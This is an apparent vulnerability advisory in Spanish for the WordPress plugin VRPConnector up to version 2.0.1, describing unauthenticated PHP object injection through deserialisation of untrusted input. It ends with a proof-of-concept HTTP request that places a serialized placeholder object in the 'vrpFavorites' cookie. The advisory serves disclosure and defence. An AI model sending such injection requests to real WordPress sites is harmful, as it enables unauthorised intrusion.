
VRPConnector <= 2.0.1 - Inyección de Objetos PHP no autenticada
VRPConnector <= 2.0.1 - Inyección de Objetos PHP sin Autenticación
El plugin VRPConnector para WordPress es vulnerable a la Inyección de Objetos PHP en versiones hasta la 2.0.1 inclusive mediante la deserialización de entrada no confiable. Esto permite que atacantes no autenticados puedan inyectar un Objeto PHP. No se conoce una cadena POP presente en el software vulnerable. Si existe una cadena POP a través de un plugin o tema adicional instalado en el sistema objetivo, podría permitir al atacante eliminar archivos arbitrarios, recuperar datos sensibles o ejecutar código.
GET / HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: vrpFavorites=O:20:"PHP_Object_Injection":0:{}
Upgrade-Insecure-Requests: 1
Priority: u=0, i